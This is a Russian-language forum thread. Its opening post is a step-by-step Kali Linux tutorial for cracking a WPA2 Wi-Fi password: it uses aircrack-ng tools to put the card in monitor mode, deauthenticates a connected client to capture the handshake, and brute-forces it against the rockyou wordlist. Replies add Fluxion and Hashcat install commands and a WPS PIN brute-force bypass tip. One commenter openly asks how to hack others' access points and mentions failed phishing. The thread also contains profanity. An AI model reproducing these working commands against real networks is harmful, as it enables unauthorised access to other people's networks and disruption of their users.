Внимание! Тема создана исключительно в ознакомительных целях и автор не побуждает никого ничего взламывать! Дороу! Хочу рассказать как же взломать свою WI-FI сеть. Пользоваться мы будем терминалом. По левой стороне в менюшке(Если вы ее не перенастраивали) будет чёрная иконка. Жмём её. С ним мы будем работать весь урок. Для начала нам нужна база паролей для ****а. В Кали уже есть база из 14 миллионов паролей и она называется "rockyou". Давайте её найдём, перенесём и распакуем на рабочий стол. Команда locate rockyou.txt.gz ищет файл "rockyou.txt.gz" по всей системе. Вот, на скриншоте видно, что путь до файла /usr/share/wordlists/rockyou.txt.gz. Теперь давайте перенесём файл на рабочий стол командой cp /usr/share/wordlists/rockyou.txt.gz ./Desktop/. Осталось только распаковать архив командой gunzip -f /Desktop/rockyou.txt.gz. Теперь нужно отключить лишние процессы, которые будут мешать работе, командой airmon-ng check kill. Теперь нужно переключить wifi-карту в режим мониторинга. Можно это сделать как на скриншоте длинющей командой ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up, но мы сделаем проще. Пишем iwconfig и смотрим как называется интерфейс. В моём случае он называется "wlan0". Пишем airmon-ng start wlan0 (Если пропадет интернет - это нормально. Чтобы вернуть интернет, переводим роутер в wifi-карту в режим контроля командой airmon-ng stop wlan0mon. Если опять не заработает, то пишите service network-manager stop, а потом service network-manager start) Заранее давайте создадим папочку под наши файлы командой cd ~/Desktop/ && mkdir caps.Теперь нам нужно мониторить сети, которые вообще видит наша WIFI-карта. Для этого используем команду airodump-ng wlan0mon. Теперь мы видим все сети и клиентов, подключенные к ним. А вот и те самые файлы создались, которые нам пригодятся позже. Но зачем нам все, если нужна только 1? Давайте отсеим. Чтобы отсеить, нам нужно знать канал сети и BSSID роутера. На скриншоте я покажу то, с чем мы сегодня работать будем. Вот эта команда нам позволит всё это сделать: airodump-ng -c 2 --bssid XX:E3:XX:4E:XX:50 -w /root/Desktop/caps/ wlan0mon. Разберём команду. Номер канала сети: -c 2 Сеть, которую мы будем взламывать: --bssid XX:E3:XX:4E:XX:50 Путь, куда будут сохраняться все полученные файлы + хендшейк: -w /root/Desktop/caps/ Значения канала и bssid у всех будут разные! То есть то, что после -c и --bssid будет разное. Используемый интерфейс: wlan0mon (У всех будет такой же) Теперь мы мониторим одну сеть. Двигаемся дальше. Как мы видем на скриншоте выше, к этой сети подключён один пользователь с MAC-адресом XX:46:XX:DF:XX:9E. Нам нужен хендшейк(Рукопожатие). С технической точки зрения, рукопожатие в беспроводных сетях — это обмен информацией между точкой доступа и клиентом в момент подключения клиента к ней. Эта информация содержит разнообразные ключи, обмен происходит в несколько стадий. И как нам его получить? Правильно, заставить клиента переподключаться к сети, чтобы получить handshake. Мы же не будем ждать, пока клиент сам это сделает? Давайте исправим. Открываем новый терминал и спользуем следующую команду: aireplay-ng -0 10 -a XX:E3:XX:XX:50 -c XX:46:XX::DF:XX:9E wlan0mon. Разберём: Говорим программе "airplay-ng" о том, что отправляем "мёртвые" пакеты: -0 Количество пакетов: 10 К какой сети будем переподключать: -a XX:E3:XX:XX:50 Какого клиента будем переподключать к сети: -c XX:46:XX::DF:XX:9E В правом углу должна появиться строчка "WPA handshake %bssid_сети%": Всё шикарно! Теперь надо сверить зашифрованный пароль с нашей базой паролей. Используем команду: aircrack-ng -a2 -b XX:E3:XX:4E:XX:50 -w /root/Desktop/rockyou.txt /root/Desktop/caps/*.cap. Указываем программе, что тип безопасности у нас WPA/WPA2/WPA2-PSK: -a2 Указываем BSSID сети, к которой будем подбирать пароль: -b XX:E3:XX:4E:XX:50 Откуда берём хендшейк файл: -w /root/Desktop/rockyou.txt /root/Desktop/caps/*.cap В итоге у нас должен начаться вот такой перебор паролей: Перебор может занять много времени и даже не найти правильного пароля. Поэтому делайте сами базы или ищите в интернете. У меня же перебор занял 3 минуты и 44 секунды. Я рад, что смог вспомнить пароль от WI-FI.kek Вот, собственно, и всё.
Опять ваши труъ уроки по хецкенгу вафль через словарь? ДА СЦУКО ВЫ УЖЕ ЗАЕБАЛИ, ДЕЛАЙТЕ НОРМАЛЬНЫЕ ТРЕДЫ ПРО КАНПЕЛЯЦИЮ ВЕДРА И ПАТЧЕНГУ КЕД ПОД БЗДЮ, РАЗВЕЛИСЬ ТУТ КУЛХЕЦКЕРЫ
Мэн, ты вижу разбираешься. Накинь годную инструкцию по хаку точки, желательно без перебора. Заеб этот ананизм. Фишером пробовал, люди не ведутся походу. А гайды школьников цветные устал перечитывать!!!
Handshake проще ловить прогой Fluxion, потом в винде подбирать пароль словарем или ****ом с помощью Hashcat (скорость перебора самая большая). утановить Fluxion вот так: git clone --recursive https://github.com/FluxionNetwork/fluxion.gitd cd fluxion ./fluxion.sh как пользоваться Hashcat сами разберетесь.
В Ютюб всё есть. Fluxion устанавливается в Kali linux, прога Hashcat есть и для винды и для Kali linux, но лучше её юзать в виндоус т.к. в Kali linux сложно устанавливать драйвера на видео.
И будет он перебирать эти пароли овердохуя и не факт что в рокъю будет этот пароль. Лечге взломать старые роуторы через PIN , но на большенстве роуторов стоит защита от перебора PINA , которую можно обойти скриптом или к конечной команде перед перебором пинов добавить ключ -L
Да хоть мопед или самокат. Это РАБОТАЕТ!!! Да не идеальный метод, ****форс вообще вещь такая, на удачу больше. Но это ПРОСТО, и повторю ещё раз - это РАБОТАЕТ.